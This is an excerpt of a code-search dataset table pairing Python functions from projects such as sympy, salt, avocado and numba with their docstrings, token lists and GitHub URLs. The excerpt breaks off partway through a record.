nwo
stringlengths 5
106
| sha
stringlengths 40
40
| path
stringlengths 4
174
| language
stringclasses 1
value | identifier
stringlengths 1
140
| parameters
stringlengths 0
87.7k
| argument_list
stringclasses 1
value | return_statement
stringlengths 0
426k
| docstring
stringlengths 0
64.3k
| docstring_summary
stringlengths 0
26.3k
| docstring_tokens
list | function
stringlengths 18
4.83M
| function_tokens
list | url
stringlengths 83
304
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
sympy/sympy
|
d822fcba181155b85ff2b29fe525adbafb22b448
|
sympy/series/limits.py
|
python
|
heuristics
|
(e, z, z0, dir)
|
return rv
|
Computes the limit of an expression term-wise.
Parameters are the same as for the ``limit`` function.
Works with the arguments of expression ``e`` one by one, computing
the limit of each and then combining the results. This approach
works only for simple limits, but it is fast.
|
Computes the limit of an expression term-wise.
Parameters are the same as for the ``limit`` function.
Works with the arguments of expression ``e`` one by one, computing
the limit of each and then combining the results. This approach
works only for simple limits, but it is fast.
|
[
"Computes",
"the",
"limit",
"of",
"an",
"expression",
"term",
"-",
"wise",
".",
"Parameters",
"are",
"the",
"same",
"as",
"for",
"the",
"limit",
"function",
".",
"Works",
"with",
"the",
"arguments",
"of",
"expression",
"e",
"one",
"by",
"one",
"computing",
"the",
"limit",
"of",
"each",
"and",
"then",
"combining",
"the",
"results",
".",
"This",
"approach",
"works",
"only",
"for",
"simple",
"limits",
"but",
"it",
"is",
"fast",
"."
] |
def heuristics(e, z, z0, dir):
    """Computes the limit of an expression term-wise.

    Parameters are the same as for the ``limit`` function.
    Works with the arguments of expression ``e`` one by one, computing
    the limit of each and then combining the results. This approach
    works only for simple limits, but it is fast.

    Returns ``None`` when the limit could not be determined this way.
    """
    rv = None
    if abs(z0) is S.Infinity:
        # Map a limit at +/-oo onto a one-sided limit at 0 via z -> 1/z.
        rv = limit(e.subs(z, 1/z), z, S.Zero, "+" if z0 is S.Infinity else "-")
        if isinstance(rv, Limit):
            # The transformed limit came back unevaluated; give up.
            return
    elif e.is_Mul or e.is_Add or e.is_Pow or e.is_Function:
        # Compute the limit of each argument and recombine with e.func.
        r = []
        for a in e.args:
            l = limit(a, z, z0, dir)
            if l.has(S.Infinity) and l.is_finite is None:
                # A term diverges.  For sums, try to rewrite e as a
                # product so the recursive call below may still succeed.
                if isinstance(e, Add):
                    m = factor_terms(e)
                    if not isinstance(m, Mul):  # try together
                        m = together(m)
                    if not isinstance(m, Mul):  # try factor if the previous methods failed
                        m = factor(e)
                    if isinstance(m, Mul):
                        return heuristics(m, z, z0, dir)
                    return
                return
            elif isinstance(l, Limit):
                # Sub-limit came back unevaluated; term-wise approach fails.
                return
            elif l is S.NaN:
                return
            else:
                r.append(l)
        if r:
            rv = e.func(*r)
            if rv is S.NaN and e.is_Mul and any(isinstance(rr, AccumBounds) for rr in r):
                # NaN from combining AccumBounds factors: separate them out
                # and take the limit of the remaining factors on their own.
                r2 = []
                e2 = []
                for ii in range(len(r)):
                    if isinstance(r[ii], AccumBounds):
                        r2.append(r[ii])
                    else:
                        e2.append(e.args[ii])
                if len(e2) > 0:
                    e3 = Mul(*e2).simplify()
                    l = limit(e3, z, z0, dir)
                    rv = l * Mul(*r2)
            if rv is S.NaN:
                # Last resort: rational simplification may remove the
                # indeterminate form before retrying the limit.
                try:
                    rat_e = ratsimp(e)
                except PolynomialError:
                    return
                if rat_e is S.NaN or rat_e == e:
                    return
                return limit(rat_e, z, z0, dir)
    return rv
|
[
"def",
"heuristics",
"(",
"e",
",",
"z",
",",
"z0",
",",
"dir",
")",
":",
"rv",
"=",
"None",
"if",
"abs",
"(",
"z0",
")",
"is",
"S",
".",
"Infinity",
":",
"rv",
"=",
"limit",
"(",
"e",
".",
"subs",
"(",
"z",
",",
"1",
"/",
"z",
")",
",",
"z",
",",
"S",
".",
"Zero",
",",
"\"+\"",
"if",
"z0",
"is",
"S",
".",
"Infinity",
"else",
"\"-\"",
")",
"if",
"isinstance",
"(",
"rv",
",",
"Limit",
")",
":",
"return",
"elif",
"e",
".",
"is_Mul",
"or",
"e",
".",
"is_Add",
"or",
"e",
".",
"is_Pow",
"or",
"e",
".",
"is_Function",
":",
"r",
"=",
"[",
"]",
"for",
"a",
"in",
"e",
".",
"args",
":",
"l",
"=",
"limit",
"(",
"a",
",",
"z",
",",
"z0",
",",
"dir",
")",
"if",
"l",
".",
"has",
"(",
"S",
".",
"Infinity",
")",
"and",
"l",
".",
"is_finite",
"is",
"None",
":",
"if",
"isinstance",
"(",
"e",
",",
"Add",
")",
":",
"m",
"=",
"factor_terms",
"(",
"e",
")",
"if",
"not",
"isinstance",
"(",
"m",
",",
"Mul",
")",
":",
"# try together",
"m",
"=",
"together",
"(",
"m",
")",
"if",
"not",
"isinstance",
"(",
"m",
",",
"Mul",
")",
":",
"# try factor if the previous methods failed",
"m",
"=",
"factor",
"(",
"e",
")",
"if",
"isinstance",
"(",
"m",
",",
"Mul",
")",
":",
"return",
"heuristics",
"(",
"m",
",",
"z",
",",
"z0",
",",
"dir",
")",
"return",
"return",
"elif",
"isinstance",
"(",
"l",
",",
"Limit",
")",
":",
"return",
"elif",
"l",
"is",
"S",
".",
"NaN",
":",
"return",
"else",
":",
"r",
".",
"append",
"(",
"l",
")",
"if",
"r",
":",
"rv",
"=",
"e",
".",
"func",
"(",
"*",
"r",
")",
"if",
"rv",
"is",
"S",
".",
"NaN",
"and",
"e",
".",
"is_Mul",
"and",
"any",
"(",
"isinstance",
"(",
"rr",
",",
"AccumBounds",
")",
"for",
"rr",
"in",
"r",
")",
":",
"r2",
"=",
"[",
"]",
"e2",
"=",
"[",
"]",
"for",
"ii",
"in",
"range",
"(",
"len",
"(",
"r",
")",
")",
":",
"if",
"isinstance",
"(",
"r",
"[",
"ii",
"]",
",",
"AccumBounds",
")",
":",
"r2",
".",
"append",
"(",
"r",
"[",
"ii",
"]",
")",
"else",
":",
"e2",
".",
"append",
"(",
"e",
".",
"args",
"[",
"ii",
"]",
")",
"if",
"len",
"(",
"e2",
")",
">",
"0",
":",
"e3",
"=",
"Mul",
"(",
"*",
"e2",
")",
".",
"simplify",
"(",
")",
"l",
"=",
"limit",
"(",
"e3",
",",
"z",
",",
"z0",
",",
"dir",
")",
"rv",
"=",
"l",
"*",
"Mul",
"(",
"*",
"r2",
")",
"if",
"rv",
"is",
"S",
".",
"NaN",
":",
"try",
":",
"rat_e",
"=",
"ratsimp",
"(",
"e",
")",
"except",
"PolynomialError",
":",
"return",
"if",
"rat_e",
"is",
"S",
".",
"NaN",
"or",
"rat_e",
"==",
"e",
":",
"return",
"return",
"limit",
"(",
"rat_e",
",",
"z",
",",
"z0",
",",
"dir",
")",
"return",
"rv"
] |
https://github.com/sympy/sympy/blob/d822fcba181155b85ff2b29fe525adbafb22b448/sympy/series/limits.py#L70-L128
|
|
dragondjf/QMarkdowner
|
fc79c85ca2949fa9ce3b317606ad7bbcd1299960
|
tftpy/TftpContexts.py
|
python
|
TftpContext.__init__
|
(self, host, port, timeout, dyn_file_func=None)
|
Constructor for the base context, setting shared instance
variables.
|
Constructor for the base context, setting shared instance
variables.
|
[
"Constructor",
"for",
"the",
"base",
"context",
"setting",
"shared",
"instance",
"variables",
"."
] |
def __init__(self, host, port, timeout, dyn_file_func=None):
    """Constructor for the base context, setting shared instance
    variables."""
    # Transfer payload state; populated later by subclasses/session setup.
    self.file_to_transfer = None
    self.fileobj = None
    self.options = None
    self.packethook = None
    # UDP socket used for the whole transfer; blocking, with a timeout.
    self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    self.sock.settimeout(timeout)
    self.timeout = timeout
    # Current state-machine state object (set by subclasses).
    self.state = None
    self.next_block = 0
    self.factory = TftpPacketFactory()
    # Note, setting the host will also set self.address, as it's a property.
    self.host = host
    self.port = port
    # The port associated with the TID
    self.tidport = None
    # Metrics
    self.metrics = TftpMetrics()
    # Flag when the transfer is pending completion.
    self.pending_complete = False
    # Time when this context last received any traffic.
    # FIXME: does this belong in metrics?
    self.last_update = 0
    # The last packet we sent, if applicable, to make resending easy.
    self.last_pkt = None
    # Optional callable used to produce file content dynamically.
    self.dyn_file_func = dyn_file_func
    # Count the number of retry attempts.
    self.retry_count = 0
|
[
"def",
"__init__",
"(",
"self",
",",
"host",
",",
"port",
",",
"timeout",
",",
"dyn_file_func",
"=",
"None",
")",
":",
"self",
".",
"file_to_transfer",
"=",
"None",
"self",
".",
"fileobj",
"=",
"None",
"self",
".",
"options",
"=",
"None",
"self",
".",
"packethook",
"=",
"None",
"self",
".",
"sock",
"=",
"socket",
".",
"socket",
"(",
"socket",
".",
"AF_INET",
",",
"socket",
".",
"SOCK_DGRAM",
")",
"self",
".",
"sock",
".",
"settimeout",
"(",
"timeout",
")",
"self",
".",
"timeout",
"=",
"timeout",
"self",
".",
"state",
"=",
"None",
"self",
".",
"next_block",
"=",
"0",
"self",
".",
"factory",
"=",
"TftpPacketFactory",
"(",
")",
"# Note, setting the host will also set self.address, as it's a property.",
"self",
".",
"host",
"=",
"host",
"self",
".",
"port",
"=",
"port",
"# The port associated with the TID",
"self",
".",
"tidport",
"=",
"None",
"# Metrics",
"self",
".",
"metrics",
"=",
"TftpMetrics",
"(",
")",
"# Fluag when the transfer is pending completion.",
"self",
".",
"pending_complete",
"=",
"False",
"# Time when this context last received any traffic.",
"# FIXME: does this belong in metrics?",
"self",
".",
"last_update",
"=",
"0",
"# The last packet we sent, if applicable, to make resending easy.",
"self",
".",
"last_pkt",
"=",
"None",
"self",
".",
"dyn_file_func",
"=",
"dyn_file_func",
"# Count the number of retry attempts.",
"self",
".",
"retry_count",
"=",
"0"
] |
https://github.com/dragondjf/QMarkdowner/blob/fc79c85ca2949fa9ce3b317606ad7bbcd1299960/tftpy/TftpContexts.py#L70-L99
|
||
avocado-framework/avocado
|
1f9b3192e8ba47d029c33fe21266bd113d17811f
|
optional_plugins/varianter_yaml_to_mux/avocado_varianter_yaml_to_mux/mux.py
|
python
|
MuxTreeNode.merge
|
(self, other)
|
Merges `other` node into this one without checking the name of the
other node. New values are appended, existing values overwritten
and unaffected ones are kept. Then all other node children are
added as children (recursively they get either appended at the end
or merged into existing node in the previous position.
|
Merges `other` node into this one without checking the name of the
other node. New values are appended, existing values overwritten
and unaffected ones are kept. Then all other node children are
added as children (recursively they get either appended at the end
or merged into existing node in the previous position.
|
[
"Merges",
"other",
"node",
"into",
"this",
"one",
"without",
"checking",
"the",
"name",
"of",
"the",
"other",
"node",
".",
"New",
"values",
"are",
"appended",
"existing",
"values",
"overwritten",
"and",
"unaffected",
"ones",
"are",
"kept",
".",
"Then",
"all",
"other",
"node",
"children",
"are",
"added",
"as",
"children",
"(",
"recursively",
"they",
"get",
"either",
"appended",
"at",
"the",
"end",
"or",
"merged",
"into",
"existing",
"node",
"in",
"the",
"previous",
"position",
"."
] |
def merge(self, other):
    """
    Merge ``other`` node into this one; the other node's name is not
    checked.  New values are appended, existing values overwritten and
    unaffected ones kept.  The other node's children are then added as
    children (recursively they are either appended at the end or merged
    into an existing node in the previous position).
    """
    for ctrl in other.ctrl:
        if not isinstance(ctrl, Control):
            continue
        if ctrl.code == REMOVE_NODE:
            # Drop every child whose name matches the control pattern.
            pattern = re.compile(ctrl.value)
            doomed = [node for node in self.children
                      if pattern.match(node.name)]
            for node in doomed:
                self.children.remove(node)
        elif ctrl.code == REMOVE_VALUE:
            # Drop every value key matching the control pattern.
            pattern = re.compile(ctrl.value)
            doomed = [key for key in self.value if pattern.match(key)]
            for key in doomed:
                self.value.pop(key, None)
    super(MuxTreeNode, self).merge(other)
    # Propagate an explicit multiplex setting; leave ours alone otherwise.
    if other.multiplex is True:
        self.multiplex = True
    elif other.multiplex is False:
        self.multiplex = False
|
[
"def",
"merge",
"(",
"self",
",",
"other",
")",
":",
"for",
"ctrl",
"in",
"other",
".",
"ctrl",
":",
"if",
"isinstance",
"(",
"ctrl",
",",
"Control",
")",
":",
"if",
"ctrl",
".",
"code",
"==",
"REMOVE_NODE",
":",
"remove",
"=",
"[",
"]",
"regexp",
"=",
"re",
".",
"compile",
"(",
"ctrl",
".",
"value",
")",
"for",
"child",
"in",
"self",
".",
"children",
":",
"if",
"regexp",
".",
"match",
"(",
"child",
".",
"name",
")",
":",
"remove",
".",
"append",
"(",
"child",
")",
"for",
"child",
"in",
"remove",
":",
"self",
".",
"children",
".",
"remove",
"(",
"child",
")",
"elif",
"ctrl",
".",
"code",
"==",
"REMOVE_VALUE",
":",
"remove",
"=",
"[",
"]",
"regexp",
"=",
"re",
".",
"compile",
"(",
"ctrl",
".",
"value",
")",
"for",
"key",
"in",
"self",
".",
"value",
":",
"if",
"regexp",
".",
"match",
"(",
"key",
")",
":",
"remove",
".",
"append",
"(",
"key",
")",
"for",
"key",
"in",
"remove",
":",
"self",
".",
"value",
".",
"pop",
"(",
"key",
",",
"None",
")",
"super",
"(",
"MuxTreeNode",
",",
"self",
")",
".",
"merge",
"(",
"other",
")",
"if",
"other",
".",
"multiplex",
"is",
"True",
":",
"self",
".",
"multiplex",
"=",
"True",
"elif",
"other",
".",
"multiplex",
"is",
"False",
":",
"self",
".",
"multiplex",
"=",
"False"
] |
https://github.com/avocado-framework/avocado/blob/1f9b3192e8ba47d029c33fe21266bd113d17811f/optional_plugins/varianter_yaml_to_mux/avocado_varianter_yaml_to_mux/mux.py#L323-L353
|
||
openshift/openshift-tools
|
1188778e728a6e4781acf728123e5b356380fe6f
|
openshift/installer/vendored/openshift-ansible-3.9.40/roles/lib_utils/library/yedit.py
|
python
|
Yedit.pop
|
(self, path, key_or_item)
|
return (False, self.yaml_dict)
|
remove a key, value pair from a dict or an item for a list
|
remove a key, value pair from a dict or an item for a list
|
[
"remove",
"a",
"key",
"value",
"pair",
"from",
"a",
"dict",
"or",
"an",
"item",
"for",
"a",
"list"
] |
def pop(self, path, key_or_item):
    ''' remove a key, value pair from a dict or an item for a list'''
    try:
        entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
    except KeyError:
        entry = None

    # Nothing at that path: report failure with the unchanged document.
    if entry is None:
        return (False, self.yaml_dict)

    if isinstance(entry, dict):
        # AUDIT:maybe-no-member makes sense due to fuzzy types
        # pylint: disable=maybe-no-member
        if key_or_item in entry:
            entry.pop(key_or_item)
            return (True, self.yaml_dict)
        return (False, self.yaml_dict)

    if isinstance(entry, list):
        # AUDIT:maybe-no-member makes sense due to fuzzy types
        # pylint: disable=maybe-no-member
        try:
            idx = entry.index(key_or_item)
        except ValueError:
            return (False, self.yaml_dict)
        entry.pop(idx)
        return (True, self.yaml_dict)

    # Entry is neither dict nor list: nothing to remove.
    return (False, self.yaml_dict)
|
[
"def",
"pop",
"(",
"self",
",",
"path",
",",
"key_or_item",
")",
":",
"try",
":",
"entry",
"=",
"Yedit",
".",
"get_entry",
"(",
"self",
".",
"yaml_dict",
",",
"path",
",",
"self",
".",
"separator",
")",
"except",
"KeyError",
":",
"entry",
"=",
"None",
"if",
"entry",
"is",
"None",
":",
"return",
"(",
"False",
",",
"self",
".",
"yaml_dict",
")",
"if",
"isinstance",
"(",
"entry",
",",
"dict",
")",
":",
"# AUDIT:maybe-no-member makes sense due to fuzzy types",
"# pylint: disable=maybe-no-member",
"if",
"key_or_item",
"in",
"entry",
":",
"entry",
".",
"pop",
"(",
"key_or_item",
")",
"return",
"(",
"True",
",",
"self",
".",
"yaml_dict",
")",
"return",
"(",
"False",
",",
"self",
".",
"yaml_dict",
")",
"elif",
"isinstance",
"(",
"entry",
",",
"list",
")",
":",
"# AUDIT:maybe-no-member makes sense due to fuzzy types",
"# pylint: disable=maybe-no-member",
"ind",
"=",
"None",
"try",
":",
"ind",
"=",
"entry",
".",
"index",
"(",
"key_or_item",
")",
"except",
"ValueError",
":",
"return",
"(",
"False",
",",
"self",
".",
"yaml_dict",
")",
"entry",
".",
"pop",
"(",
"ind",
")",
"return",
"(",
"True",
",",
"self",
".",
"yaml_dict",
")",
"return",
"(",
"False",
",",
"self",
".",
"yaml_dict",
")"
] |
https://github.com/openshift/openshift-tools/blob/1188778e728a6e4781acf728123e5b356380fe6f/openshift/installer/vendored/openshift-ansible-3.9.40/roles/lib_utils/library/yedit.py#L521-L551
|
|
CoinCheung/BiSeNet
|
f9231b7c971413e6ebdfcd961fbea53417b18851
|
lib/models/bisenetv2.py
|
python
|
BiSeNetV2.__init__
|
(self, n_classes, aux_mode='train')
|
[] |
def __init__(self, n_classes, aux_mode='train'):
    """Build the BiSeNetV2 network.

    Args:
        n_classes: number of output segmentation classes.
        aux_mode: when ``'train'``, four auxiliary segment heads are
            also built (presumably for auxiliary supervision during
            training — confirm against the forward pass); any other
            value builds only the main head.
    """
    super(BiSeNetV2, self).__init__()
    self.aux_mode = aux_mode
    self.detail = DetailBranch()
    self.segment = SegmentBranch()
    self.bga = BGALayer()
    ## TODO: what is the number of mid chan ?
    # Main head: 128 input channels, 1024 mid channels, 8x upsampling.
    self.head = SegmentHead(128, 1024, n_classes, up_factor=8, aux=False)
    if self.aux_mode == 'train':
        # Auxiliary heads over intermediate features; up_factor grows
        # with depth to restore the input resolution.
        self.aux2 = SegmentHead(16, 128, n_classes, up_factor=4)
        self.aux3 = SegmentHead(32, 128, n_classes, up_factor=8)
        self.aux4 = SegmentHead(64, 128, n_classes, up_factor=16)
        self.aux5_4 = SegmentHead(128, 128, n_classes, up_factor=32)
    self.init_weights()
|
[
"def",
"__init__",
"(",
"self",
",",
"n_classes",
",",
"aux_mode",
"=",
"'train'",
")",
":",
"super",
"(",
"BiSeNetV2",
",",
"self",
")",
".",
"__init__",
"(",
")",
"self",
".",
"aux_mode",
"=",
"aux_mode",
"self",
".",
"detail",
"=",
"DetailBranch",
"(",
")",
"self",
".",
"segment",
"=",
"SegmentBranch",
"(",
")",
"self",
".",
"bga",
"=",
"BGALayer",
"(",
")",
"## TODO: what is the number of mid chan ?",
"self",
".",
"head",
"=",
"SegmentHead",
"(",
"128",
",",
"1024",
",",
"n_classes",
",",
"up_factor",
"=",
"8",
",",
"aux",
"=",
"False",
")",
"if",
"self",
".",
"aux_mode",
"==",
"'train'",
":",
"self",
".",
"aux2",
"=",
"SegmentHead",
"(",
"16",
",",
"128",
",",
"n_classes",
",",
"up_factor",
"=",
"4",
")",
"self",
".",
"aux3",
"=",
"SegmentHead",
"(",
"32",
",",
"128",
",",
"n_classes",
",",
"up_factor",
"=",
"8",
")",
"self",
".",
"aux4",
"=",
"SegmentHead",
"(",
"64",
",",
"128",
",",
"n_classes",
",",
"up_factor",
"=",
"16",
")",
"self",
".",
"aux5_4",
"=",
"SegmentHead",
"(",
"128",
",",
"128",
",",
"n_classes",
",",
"up_factor",
"=",
"32",
")",
"self",
".",
"init_weights",
"(",
")"
] |
https://github.com/CoinCheung/BiSeNet/blob/f9231b7c971413e6ebdfcd961fbea53417b18851/lib/models/bisenetv2.py#L314-L329
|
||||
saltstack/salt
|
fae5bc757ad0f1716483ce7ae180b451545c2058
|
salt/modules/rh_service.py
|
python
|
status
|
(name, sig=None)
|
return results[name]
|
Return the status for a service.
If the name contains globbing, a dict mapping service name to True/False
values is returned.
.. versionchanged:: 2018.3.0
The service name can now be a glob (e.g. ``salt*``)
Args:
name (str): The name of the service to check
sig (str): Signature to use to find the service via ps
Returns:
bool: True if running, False otherwise
dict: Maps service name to True if running, False otherwise
CLI Example:
.. code-block:: bash
salt '*' service.status <service name> [service signature]
|
Return the status for a service.
If the name contains globbing, a dict mapping service name to True/False
values is returned.
|
[
"Return",
"the",
"status",
"for",
"a",
"service",
".",
"If",
"the",
"name",
"contains",
"globbing",
"a",
"dict",
"mapping",
"service",
"name",
"to",
"True",
"/",
"False",
"values",
"is",
"returned",
"."
] |
def status(name, sig=None):
    """
    Return the status for a service.
    If the name contains globbing, a dict mapping service name to True/False
    values is returned.

    .. versionchanged:: 2018.3.0
        The service name can now be a glob (e.g. ``salt*``)

    Args:
        name (str): The name of the service to check
        sig (str): Signature to use to find the service via ps

    Returns:
        bool: True if running, False otherwise
        dict: Maps service name to True if running, False otherwise

    CLI Example:

    .. code-block:: bash

        salt '*' service.status <service name> [service signature]
    """
    # A signature short-circuits everything: just look for the process.
    if sig:
        return bool(__salt__["status.pid"](sig))

    contains_globbing = bool(re.search(r"\*|\?|\[.+\]", name))
    if contains_globbing:
        services = fnmatch.filter(get_all(), name)
    else:
        services = [name]

    results = {}
    for service in services:
        if _service_is_upstart(service):
            # Upstart reports state in its stdout rather than the retcode.
            output = __salt__["cmd.run"](
                "status {}".format(service), python_shell=False
            )
            results[service] = "start/running" in output
        else:
            # SysV init: a zero exit status means the service is running.
            retcode = __salt__["cmd.retcode"](
                "/sbin/service {} status".format(service),
                python_shell=False,
                ignore_retcode=True,
            )
            results[service] = retcode == 0

    return results if contains_globbing else results[name]
|
[
"def",
"status",
"(",
"name",
",",
"sig",
"=",
"None",
")",
":",
"if",
"sig",
":",
"return",
"bool",
"(",
"__salt__",
"[",
"\"status.pid\"",
"]",
"(",
"sig",
")",
")",
"contains_globbing",
"=",
"bool",
"(",
"re",
".",
"search",
"(",
"r\"\\*|\\?|\\[.+\\]\"",
",",
"name",
")",
")",
"if",
"contains_globbing",
":",
"services",
"=",
"fnmatch",
".",
"filter",
"(",
"get_all",
"(",
")",
",",
"name",
")",
"else",
":",
"services",
"=",
"[",
"name",
"]",
"results",
"=",
"{",
"}",
"for",
"service",
"in",
"services",
":",
"if",
"_service_is_upstart",
"(",
"service",
")",
":",
"cmd",
"=",
"\"status {}\"",
".",
"format",
"(",
"service",
")",
"results",
"[",
"service",
"]",
"=",
"\"start/running\"",
"in",
"__salt__",
"[",
"\"cmd.run\"",
"]",
"(",
"cmd",
",",
"python_shell",
"=",
"False",
")",
"else",
":",
"cmd",
"=",
"\"/sbin/service {} status\"",
".",
"format",
"(",
"service",
")",
"results",
"[",
"service",
"]",
"=",
"(",
"__salt__",
"[",
"\"cmd.retcode\"",
"]",
"(",
"cmd",
",",
"python_shell",
"=",
"False",
",",
"ignore_retcode",
"=",
"True",
")",
"==",
"0",
")",
"if",
"contains_globbing",
":",
"return",
"results",
"return",
"results",
"[",
"name",
"]"
] |
https://github.com/saltstack/salt/blob/fae5bc757ad0f1716483ce7ae180b451545c2058/salt/modules/rh_service.py#L495-L541
|
|
numba/numba
|
bf480b9e0da858a65508c2b17759a72ee6a44c51
|
numba/core/datamodel/models.py
|
python
|
DataModel.traverse
|
(self, builder)
|
return []
|
Traverse contained members.
Returns a iterable of contained (types, getters).
Each getter is a one-argument function accepting a LLVM value.
|
Traverse contained members.
Returns a iterable of contained (types, getters).
Each getter is a one-argument function accepting a LLVM value.
|
[
"Traverse",
"contained",
"members",
".",
"Returns",
"a",
"iterable",
"of",
"contained",
"(",
"types",
"getters",
")",
".",
"Each",
"getter",
"is",
"a",
"one",
"-",
"argument",
"function",
"accepting",
"a",
"LLVM",
"value",
"."
] |
def traverse(self, builder):
    """
    Traverse contained members.

    Returns an iterable of contained (types, getters); each getter is a
    one-argument function accepting a LLVM value.  The base data model
    has no contained members, so this yields nothing.
    """
    return []
|
[
"def",
"traverse",
"(",
"self",
",",
"builder",
")",
":",
"return",
"[",
"]"
] |
https://github.com/numba/numba/blob/bf480b9e0da858a65508c2b17759a72ee6a44c51/numba/core/datamodel/models.py#L89-L95
|
|
home-assistant/core
|
265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1
|
homeassistant/components/renault/renault_entities.py
|
python
|
RenaultEntity.__init__
|
(
self,
vehicle: RenaultVehicleProxy,
description: EntityDescription,
)
|
Initialise entity.
|
Initialise entity.
|
[
"Initialise",
"entity",
"."
] |
def __init__(
    self,
    vehicle: RenaultVehicleProxy,
    description: EntityDescription,
) -> None:
    """Initialise entity.

    Stores the vehicle proxy and entity description, mirrors the
    vehicle's device info onto the entity, and derives a unique id of
    the form ``<vin>_<description.key>`` (lowercased).
    """
    self.vehicle = vehicle
    self.entity_description = description
    self._attr_device_info = self.vehicle.device_info
    self._attr_unique_id = f"{self.vehicle.details.vin}_{description.key}".lower()
|
[
"def",
"__init__",
"(",
"self",
",",
"vehicle",
":",
"RenaultVehicleProxy",
",",
"description",
":",
"EntityDescription",
",",
")",
"->",
"None",
":",
"self",
".",
"vehicle",
"=",
"vehicle",
"self",
".",
"entity_description",
"=",
"description",
"self",
".",
"_attr_device_info",
"=",
"self",
".",
"vehicle",
".",
"device_info",
"self",
".",
"_attr_unique_id",
"=",
"f\"{self.vehicle.details.vin}_{description.key}\"",
".",
"lower",
"(",
")"
] |
https://github.com/home-assistant/core/blob/265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1/homeassistant/components/renault/renault_entities.py#L33-L42
|
||
meetbill/zabbix_manager
|
739e5b51facf19cc6bda2b50f29108f831cf833e
|
ZabbixTool/lib_zabbix/w_lib/mylib/xlwt/Autofit.py
|
python
|
HandleBlankCell
|
(workBook, row, cell)
|
return HandleDefaultCell(workBook, row, cell)
|
Will handle blank cells using the default handler
|
Will handle blank cells using the default handler
|
[
"Will",
"handle",
"blank",
"cells",
"using",
"the",
"default",
"handler"
] |
def HandleBlankCell(workBook, row, cell):
    """
    Handle a blank cell: zero when the workbook treats empty cells as
    zero, otherwise defer to the default cell handler.
    """
    if not workBook.emptyCellsAreZero:
        return HandleDefaultCell(workBook, row, cell)
    return 0
|
[
"def",
"HandleBlankCell",
"(",
"workBook",
",",
"row",
",",
"cell",
")",
":",
"if",
"workBook",
".",
"emptyCellsAreZero",
":",
"return",
"0",
"return",
"HandleDefaultCell",
"(",
"workBook",
",",
"row",
",",
"cell",
")"
] |
https://github.com/meetbill/zabbix_manager/blob/739e5b51facf19cc6bda2b50f29108f831cf833e/ZabbixTool/lib_zabbix/w_lib/mylib/xlwt/Autofit.py#L320-L328
|
|
sagemath/sage
|
f9b2db94f675ff16963ccdefba4f1a3393b3fe0d
|
src/sage/interfaces/mathics.py
|
python
|
Mathics._object_class
|
(self)
|
return MathicsElement
|
r"""
Return the element class of this parent.
This is used in the interface class.
EXAMPLES::
sage: mathics._object_class()
<class 'sage.interfaces.mathics.MathicsElement'>
|
r"""
Return the element class of this parent.
This is used in the interface class.
|
[
"r",
"Return",
"the",
"element",
"class",
"of",
"this",
"parent",
".",
"This",
"is",
"used",
"in",
"the",
"interface",
"class",
"."
] |
def _object_class(self):
    r"""
    Return the element class of this parent.

    This is used in the interface class.

    EXAMPLES::

        sage: mathics._object_class()
        <class 'sage.interfaces.mathics.MathicsElement'>
    """
    return MathicsElement
|
[
"def",
"_object_class",
"(",
"self",
")",
":",
"return",
"MathicsElement"
] |
https://github.com/sagemath/sage/blob/f9b2db94f675ff16963ccdefba4f1a3393b3fe0d/src/sage/interfaces/mathics.py#L729-L740
|
|
JetBrains/python-skeletons
|
95ad24b666e475998e5d1cc02ed53a2188036167
|
builtins.py
|
python
|
int.__lshift__
|
(self, n)
|
return 0
|
x shifted left by n bits.
:type n: numbers.Integral
:rtype: int
|
x shifted left by n bits.
|
[
"x",
"shifted",
"left",
"by",
"n",
"bits",
"."
] |
def __lshift__(self, n):
"""x shifted left by n bits.
:type n: numbers.Integral
:rtype: int
"""
return 0
|
[
"def",
"__lshift__",
"(",
"self",
",",
"n",
")",
":",
"return",
"0"
] |
https://github.com/JetBrains/python-skeletons/blob/95ad24b666e475998e5d1cc02ed53a2188036167/builtins.py#L488-L494
|
|
molecularsets/moses
|
7b8f83b21a9b7ded493349ec8ef292384ce2bb52
|
moses/metrics/metrics.py
|
python
|
get_all_metrics
|
(gen, k=None, n_jobs=1,
device='cpu', batch_size=512, pool=None,
test=None, test_scaffolds=None,
ptest=None, ptest_scaffolds=None,
train=None)
|
return metrics
|
Computes all available metrics between test (scaffold test)
and generated sets of SMILES.
Parameters:
gen: list of generated SMILES
k: int or list with values for unique@k. Will calculate number of
unique molecules in the first k molecules. Default [1000, 10000]
n_jobs: number of workers for parallel processing
device: 'cpu' or 'cuda:n', where n is GPU device number
batch_size: batch size for FCD metric
pool: optional multiprocessing pool to use for parallelization
test (None or list): test SMILES. If None, will load
a default test set
test_scaffolds (None or list): scaffold test SMILES. If None, will
load a default scaffold test set
ptest (None or dict): precalculated statistics of the test set. If
None, will load default test statistics. If you specified a custom
test set, default test statistics will be ignored
ptest_scaffolds (None or dict): precalculated statistics of the
scaffold test set If None, will load default scaffold test
statistics. If you specified a custom test set, default test
statistics will be ignored
train (None or list): train SMILES. If None, will load a default
train set
Available metrics:
* %valid
* %unique@k
* Frechet ChemNet Distance (FCD)
* Fragment similarity (Frag)
* Scaffold similarity (Scaf)
* Similarity to nearest neighbour (SNN)
* Internal diversity (IntDiv)
* Internal diversity 2: using square root of mean squared
Tanimoto similarity (IntDiv2)
* %passes filters (Filters)
* Distribution difference for logP, SA, QED, weight
* Novelty (molecules not present in train)
|
Computes all available metrics between test (scaffold test)
and generated sets of SMILES.
Parameters:
gen: list of generated SMILES
k: int or list with values for unique@k. Will calculate number of
unique molecules in the first k molecules. Default [1000, 10000]
n_jobs: number of workers for parallel processing
device: 'cpu' or 'cuda:n', where n is GPU device number
batch_size: batch size for FCD metric
pool: optional multiprocessing pool to use for parallelization
|
[
"Computes",
"all",
"available",
"metrics",
"between",
"test",
"(",
"scaffold",
"test",
")",
"and",
"generated",
"sets",
"of",
"SMILES",
".",
"Parameters",
":",
"gen",
":",
"list",
"of",
"generated",
"SMILES",
"k",
":",
"int",
"or",
"list",
"with",
"values",
"for",
"unique@k",
".",
"Will",
"calculate",
"number",
"of",
"unique",
"molecules",
"in",
"the",
"first",
"k",
"molecules",
".",
"Default",
"[",
"1000",
"10000",
"]",
"n_jobs",
":",
"number",
"of",
"workers",
"for",
"parallel",
"processing",
"device",
":",
"cpu",
"or",
"cuda",
":",
"n",
"where",
"n",
"is",
